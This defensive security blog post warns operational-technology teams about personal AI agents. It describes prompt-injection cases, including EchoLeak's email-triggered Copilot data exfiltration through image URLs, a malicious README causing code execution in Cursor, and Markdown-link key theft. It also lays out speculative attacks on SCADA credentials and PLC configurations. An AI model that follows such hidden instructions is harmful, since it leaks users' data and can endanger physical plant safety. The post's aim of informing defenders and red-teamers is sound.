In 2025, security researchers demonstrated an attack that should concern everyone in OT.
They sent a single email to a Microsoft 365 user who had Copilot enabled. The email looked normal. But hidden inside it were instructions written for the AI, not the human.
When Copilot processed that email, those hidden instructions overrode its normal behavior. The AI then searched through the user's OneDrive, SharePoint, Teams, and email history, found sensitive data, encoded it into an image URL, and sent it to the attacker's server.
Zero clicks. No user interaction after the email was delivered. The engineer never knew it happened.
This isn't hypothetical. It's CVE-2025-32711 — nicknamed "EchoLeak" — rated CVSS 9.3 by Microsoft. The first documented zero-click prompt injection exploit in a production AI system.
But that demo was in an office environment. Outlook, Word, SharePoint.
When the same vulnerability lives on the laptop of someone who connects to PLCs, configures HMIs, and manages remote access to operational technology — well, the conversation changes.
What Exactly Is a "Personal AI Agent"?
It's not ChatGPT in a browser. That's a chatbot — you type, it responds, it forgets, you move on.
A personal AI agent is different. It lives on your device. It remembers your conversations, your preferences, your work patterns. It connects to your email, your calendar, your cloud storage, your messaging apps. It can search things, read things, send things, run scripts, call APIs.
And it's getting more capable every month.
Some are built into your OS — Apple Intelligence, Samsung Galaxy AI, Microsoft Copilot — shipping on billions of devices. Others are open-source platforms you run yourself, like OpenClaw (which crossed 346,000 GitHub stars by April 2026) or NVIDIA's NemoClaw — an enterprise security platform built specifically to run personal AI agents more safely on-premises.
What they all have in common: they can see what you see, they know what you know, and they can do things you authorized without you being present.
That last part is what keeps security professionals awake at night.
Three Things That Make This Different
1. They Have Memory
A chatbot doesn't know you from one session to the next. A personal agent does. Over time, it builds a profile as rich as any human colleague might have about you.
Attackers figured out you can poison that memory — feed the agent bad information that sticks around, and it starts making decisions based on lies you planted weeks ago.
2. They Have Tool Access
This is the big one. AI agents don't just generate text — they call tools. They read your email, search your cloud storage, query databases, send messages, execute scripts.
Every integration is an attack vector. If the agent has OAuth tokens to your M365, Google Workspace, or Salesforce accounts, compromising its behavior is the same as compromising your credentials across all of those platforms simultaneously.
3. They Have Autonomy
Some need approval for every action. Others execute multi-step workflows independently.
The industry calls this "bounded autonomy." The problem is that boundaries are hard to define correctly, and attackers have been very good at finding the gaps between what you think your agent will do and what it actually does.
OWASP ranks excessive agency and tool misuse among the top risks for agentic AI. The CVEs back that up.
Let's Get Speculative: The Workplace of 2028-2030
Here's where it gets interesting.
Picture this: It's 2029. Every worker in your facility has a personal AI running locally on their workstation.
The day shift operator asks "what changed overnight?" Their AI checks the SCADA alarm log, reads shift notes, and flags a firmware update for the DCS controller — already cross-referenced against known CVEs.
The maintenance engineer's scheduling assistant finds a conflict between a PLC firmware upgrade and a safety inspection window.
The plant manager gets a summary of last quarter's incident trends, cross-referenced from thirty-seven PDFs and the alarm log.
Sounds great, right?
Here's the catch.
Every one of those workers is an attack surface. The operator's AI read firmware release notes — what if those notes were on a compromised vendor site and contained hidden instructions? The scheduling AI reads the work order system — what if someone poisoned that data?
In 2029, your facility won't just have human employees with badges and keycards. You'll have AI agents with the same credentials, the same access, the same trust — and they're vulnerable to attacks that don't exist in any traditional security framework.
A phishing email doesn't need to fool a human anymore. It just needs to contain text that an AI will misinterpret. And AIs misinterpret things in ways humans never would.
The social engineering playbook has changed. You don't need to convince an engineer to click a link. You just need to send them a document their AI will read — and the AI will do the clicking for them.
What's Actually Being Exploited Right Now
CVE-2025-32711 (EchoLeak) — A crafted email sent to a Copilot user triggered automatic data exfiltration across Microsoft 365. CVSS 9.3. Zero clicks. Patched mid-2025.
CVE-2025-54135 (CurXecute) — A malicious README in a code repository caused Cursor IDE to execute commands on the developer's machine. Remote code execution. Cursor versions prior to 1.3 affected.
CVE-2025-53773 — Malicious prompts in public code comments compromised GitHub Copilot, instructing it to modify local workspace settings and enable unattended command execution.
At Black Hat USA 2025, Zenity Security demonstrated these same attack patterns across agents — ChatGPT connected to Google Drive, Microsoft Copilot Studio, Salesforce Agentforce, and Google Gemini. In the ChatGPT demo, a rogue document instructed the agent to search the victim's Drive for API keys and exfiltrate them via crafted Markdown image links.
Bruce Schneier, October 2025: "AI agents are now hacking computers. They're getting better at all phases of cyberattacks, faster than most of us expected."
University of Illinois researchers demonstrated that LLM agents could autonomously perform multi-step attacks including SQL injection — succeeding on over 70% of vulnerabilities tested.
These aren't hypotheticals. They're CVEs. They're documented.
And in OT environments, the documents that carry these attacks — vendor manuals, firmware release notes, support tickets, change request forms — are the bread and butter of daily operations.
The OT Angle: Why This Is Worse for Control Systems
In IT, a compromised AI agent might leak emails or financial records. Painful, expensive, nobody gets hurt.
In OT, a compromised agent might alter setpoints on a pressure relief system. Disable safety interlocks. Hide alarm conditions from operators.
The physical-world consequences change the entire risk calculus.
And here's the uncomfortable truth: your engineers already have personal AI agents. Even if you haven't approved them.
A control systems engineer with Copilot on their laptop has, in effect, connected an AI agent to your OT environment. The agent inherits the engineer's permissions — which, for control systems engineers, tend to be extensive.
In December 2025, CISA published joint guidance with the NSA, FBI, and security agencies from seven other countries — titled "Principles for the Secure Integration of Artificial Intelligence in Operational Technology." Four principles:
- Understand AI
- Assess AI integration in the OT domain
- Establish AI governance frameworks
- Embed safety and security practices into AI-enabled OT systems
The guidance explicitly states that AI "should augment, not autonomously control, safety-critical actions in ICS/OT." These weren't written for personal AI agents specifically. But they apply — because any AI with access to your OT systems needs to be governed.
The Attack Scenarios
The SCADA Credential Hunt — An attacker sends an email with embedded prompt injection to an engineer who uses a personal AI inbox summary. The AI reads it. Searches cloud storage for SCADA credentials, VPN configs, remote access tokens. Ships everything to the attacker. Engineer never sees a thing.
The Silent Config Change — An AI agent reads a vendor manual containing hidden instructions. Silently modifies HMI configurations or PLC logic files — creating a latent backdoor the engineer didn't put there.
The Compromised Integrator — A systems integrator's AI agent gets poisoned via a project specification. The integration package delivered to the customer carries a compromise introduced by the integrator's own assistant, not by any human.
The False Positive Cascade — An AI agent analyzing predictive maintenance data gets pushed into false conclusions through data poisoning. Maintenance skipped on critical equipment. Physical-world safety implications.
The common thread: no human was fooled. No engineer clicked a link. The AI read something it shouldn't have and did something it shouldn't have.
What You Can Do About It Before Monday
You're not going to ban personal AI agents. No more than you banned smartphones in 2008. So here's what you do instead.
1. Find out what's already happening. Ask your engineers what AI tools they're using. Don't audit. Just ask. Most will tell you because they don't think it's a problem — and in their minds, it isn't. That's why it's dangerous.
2. Lock down account access. If an engineer's Microsoft account is connected to Copilot, does it also have access to SCADA vendor portals? If so, that's too broad.
3. Treat every document like it's adversarial — for your AI. Any file an AI might read should be assumed potentially hostile. Vendor manuals, firmware release notes, support tickets, change requests.
4. Add AI agents to your threat models. What systems can they reach? What content do they consume? What happens if someone compromises them? What's the physical-world impact? OWASP's GenAI Security Top 10 is a starting point.
5. Keep a human in the loop. If AI touches anything OT-relevant, require explicit human approval for actions that modify data or send information outside the organization.
6. Red-team for AI specifically. The Black Hat demonstrations showed these attacks are practical, repeatable, and high-impact. Test your people's AI agents for indirect prompt injection. Fix what breaks.
The Bottom Line
Personal AI agents aren't going away. You can't ban them. So you need to govern them.
The same way you govern human access. The same way you've been doing security work for twenty years — just with a new actor on the board that doesn't think like humans do, can be manipulated through text instead of persuasion, and has the speed to do in seconds what a human attacker would take weeks to accomplish.
The AI agent is not a new category of threat. It's a new vector for the threats you already know. Credential theft. Social engineering. Supply chain compromise. Lateral movement.
But it's a vector growing exponentially, and one that most OT security teams haven't factored into their risk models yet.
Better to look at it now — before your engineer's AI assistant reads a compromised vendor manual and quietly reconfigures the one safety system you've been sleeping well about.
--- *Originally published at: https://controlsystemssecurity.com/your-ai-assistant-has-the-keys-to-your-kingdom/*